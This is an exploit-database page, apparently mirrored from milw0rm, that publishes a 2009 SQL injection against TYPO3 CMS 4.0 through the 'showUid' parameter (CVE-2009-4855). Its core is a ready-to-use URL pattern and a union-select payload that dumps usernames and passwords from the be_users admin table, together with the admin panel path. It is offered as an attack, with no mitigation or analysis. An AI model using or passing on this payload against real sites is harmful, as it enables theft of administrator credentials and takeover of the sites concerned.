[] NeoSense
E X P L O I T S
title author type platform port cve id

TYPO3 CMS 4.0 - 'showUid' SQL Injection

Author: Ro0T-MaFia
type: webapps
platform: php
port: 
date_added: 2009-08-05 
date_updated:  
verified: 1 
codes: OSVDB-64565;CVE-2009-4855 
tags: 
aliases:  
screenshot_url:  
application_url: 
#-----
TYPO3 CMS 4.0  SQL-Injection Vulnerability
#-----


 #####################################################
 # [+] Author        :  CyberNaj, JxE-13             #
 # [+] Vulnerability :  SQL injection                #
 # [+] Group         :  Ro0T-MaFia                   #
 #####################################################

#-----

 Info CMS:

 * Name      : TYPO3
 * Web       : http://typo3.org
 * dowloand  : http://typo3.org/download/packages/
 * Country   : Venezuela

#-----

Vulnerability:

http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]

SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--

Admin Panel: /typo3/index.php

#-----

# milw0rm.com [2009-08-06]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.